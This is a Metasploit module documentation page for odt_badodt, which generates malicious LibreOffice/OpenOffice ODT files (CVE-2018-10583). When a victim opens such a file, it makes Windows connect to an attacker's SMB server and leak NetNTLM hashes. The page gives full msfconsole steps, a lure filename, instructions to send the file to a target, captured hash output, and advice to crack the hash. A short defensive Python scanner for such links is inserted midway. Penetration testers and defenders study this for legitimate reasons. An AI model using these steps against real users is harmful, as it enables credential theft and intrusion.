LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator - Metasploit


This page contains detailed information about how to use the auxiliary/fileformat/odt_badodt Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator
Module: auxiliary/fileformat/odt_badodt
Source code: modules/auxiliary/fileformat/odt_badodt.rb
Disclosure date: 2018-05-01
Last modification time: 2018-06-06 11:26:20 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2018-10583

Generates a Malicious ODT File which can be used with auxiliary/server/capture/smb or similar to capture hashes.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect.

Basic Usage


msf > use auxiliary/fileformat/odt_badodt
msf auxiliary(odt_badodt) > show targets
    ... a list of targets ...
msf auxiliary(odt_badodt) > set TARGET target-id
msf auxiliary(odt_badodt) > show options
    ... show and set options ...
msf auxiliary(odt_badodt) > exploit

Knowledge Base


The BADODT module creates an ODT file containing a file:// link that points back to a listening SMB capture server. The module has been tested against both LibreOffice 6.03 and Apache OpenOffice 4.1.5; when the document is opened, the application connects to the server without showing the user any warning. This gives an attacker the opportunity to potentially steal NetNTLM hashes.
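To check a received document for the link described above, the following added example (not code from the module or from the original page) scans an ODT's XML parts for xlink:href values that resolve to a remote file host. The names remote_host, scan_odt and sample_odt are hypothetical, and the fixture with documentation address 192.0.2.10 is constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
XML_PARTS = ("content.xml", "styles.xml")

def remote_host(href):
    """Return the host a link would make the client contact over SMB, else None."""
    if href.startswith("\\\\"):                   # raw UNC path: \\host\share\x
        return href[2:].split("\\")[0] or None
    try:
        url = urlsplit(href)
    except ValueError:                            # malformed authority part
        return None
    if url.scheme.lower() != "file":
        return None
    if url.netloc and url.netloc.lower() != "localhost":
        return url.netloc                         # file://host/share/x
    if url.path.startswith("//"):                 # file:////host/share/x
        return url.path.lstrip("/").split("/")[0] or None
    return None                                   # file:///local/path

def scan_odt(data):
    """List (part, element, href, host) for each remote file link in ODT bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as odt:
        for part in [p for p in XML_PARTS if p in odt.namelist()]:
            raw = odt.read(part)
            if b"<!DOCTYPE" in raw or b"<!ENTITY" in raw:
                raise ValueError(part + ": DTD present, refusing to parse")
            for el in ET.fromstring(raw).iter():
                host = remote_host(el.get(XLINK_HREF, ""))
                if host:
                    findings.append((part, el.tag.split("}")[-1], el.get(XLINK_HREF), host))
    return findings

def sample_odt():
    """Constructed test fixture: a zip holding only a minimal content.xml."""
    xml = ('<o:document-content xmlns:o="urn:oasis:names:tc:opendocument:xmlns:office:1.0"'
           ' xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0"'
           ' xmlns:xlink="http://www.w3.org/1999/xlink">'
           '<draw:image xlink:href="Pictures/logo.png"/>'
           '<draw:image xlink:href="file://192.0.2.10/test.jpg"/></o:document-content>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("content.xml", xml)
    return buf.getvalue()
```

The scanner only reports file:// and UNC links, which is the case this page describes; links embedded in the package under other schemes are out of its scope.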

Vulnerable Application


Verification Steps


  1. Install the application
  2. Start msfconsole
  3. Do: use auxiliary/fileformat/odt_badodt
  4. Customise Options as required
  5. Do: run
  6. A malicious document will then be generated.
  7. Configure auxiliary/server/capture/smb or similar to capture hashes.
  8. Send document to target and wait for them to open.

Options


CREATOR

This option allows you to customise the document author for the new document: set CREATOR New_User

FILENAME

This option allows you to customise the generated filename: set FILENAME salary.odt

LHOST

This option allows you to set the IP address of the SMB Listener that the .odt document points to:

set LHOST 192.168.1.25

Scenarios


Install LibreOffice 6.03 or Apache OpenOffice 4.1.5 on a Windows workstation. (Note: This attack does not work against Mac or Linux versions.)

  msf5 > use auxiliary/fileformat/odt_badodt 
  msf5 auxiliary(fileformat/odt_badodt) > set FILENAME salary.odt
  FILENAME => salary.odt
  msf5 auxiliary(fileformat/odt_badodt) > set LHOST 192.168.1.25
  LHOST => 192.168.1.25
  msf5 auxiliary(fileformat/odt_badodt) > set CREATOR A_USER
  CREATOR => A_USER
  msf5 auxiliary(fileformat/odt_badodt) > exploit

  [*] Generating Malicious ODT File 
  [*] SMB Listener Address will be set to 192.168.1.25
  [+] salary.odt stored at /root/.msf4/local/salary.odt
  [*] Auxiliary module execution completed
  msf auxiliary(fileformat/odt_badodt) > 

On an attacker workstation, use a tool to serve and capture an SMB share on port 445, capturing NTLM hashes. Note that any tool listening on :445 will require superuser permissions:

  $ sudo ./msfconsole
  msf5 > use auxiliary/server/capture/smb 
  msf5 auxiliary(server/capture/smb) > run
  [*] Auxiliary module running as background job 0.
  msf5 auxiliary(server/capture/smb) >
  [*] Server started.

  msf5 auxiliary(server/capture/smb) >

Leave the Metasploit SMB server listening while the user opens the document. Upon opening the ODT file, the user's workstation will attempt to connect (and authenticate) to the attacker workstation:

  [*] SMB Captured - 2018-06-06 11:14:23 -0500
  NTLMv2 Response Captured from 192.168.108.171:49180 - 192.168.108.171
  USER:asoto-r7 DOMAIN:WIN-TSD7B7BQKDQ OS: LM:
  LMHASH:Disabled
  LM_CLIENT_CHALLENGE:Disabled
  NTHASH:3910d841a30289ad9876e09321c1099a
  NT_CLIENT_CHALLENGE:0101000000000000a9d923e9f909391957581abc8d91038400000000020000000000000000000000

Finally, crack the hash to capture the user's credentials.

Msfconsole Usage


Here is how the fileformat/odt_badodt auxiliary module looks in the msfconsole:

msf6 > use auxiliary/fileformat/odt_badodt

msf6 auxiliary(fileformat/odt_badodt) > show info

       Name: LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator
     Module: auxiliary/fileformat/odt_badodt
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2018-05-01

Provided by:
  Richard Davy - secureyourit.co.uk

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  CREATOR   RD_PENTEST       yes       Document author for new document
  FILENAME  bad.odt          yes       Filename for the new document
  LHOST                      yes       IP Address of SMB Listener that the .odt document points to

Description:
  Generates a Malicious ODT File which can be used with 
  auxiliary/server/capture/smb or similar to capture hashes.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-10583
  https://secureyourit.co.uk/wp/2018/05/01/creating-malicious-odt-files/

Module Options


This is a complete list of options available in the fileformat/odt_badodt auxiliary module:

msf6 auxiliary(fileformat/odt_badodt) > show options

Module options (auxiliary/fileformat/odt_badodt):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CREATOR   RD_PENTEST       yes       Document author for new document
   FILENAME  bad.odt          yes       Filename for the new document
   LHOST                      yes       IP Address of SMB Listener that the .odt document points to

Advanced Options


Here is a complete list of advanced options supported by the fileformat/odt_badodt auxiliary module:

msf6 auxiliary(fileformat/odt_badodt) > show advanced

Module advanced options (auxiliary/fileformat/odt_badodt):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   DisablePayloadHandler  true             no        Disable the handler code for the selected payload
   VERBOSE                false            no        Enable detailed status messages
   WORKSPACE                               no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the fileformat/odt_badodt module can do:

msf6 auxiliary(fileformat/odt_badodt) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the fileformat/odt_badodt auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(fileformat/odt_badodt) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Authors


Richard Davy - secureyourit.co.uk

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.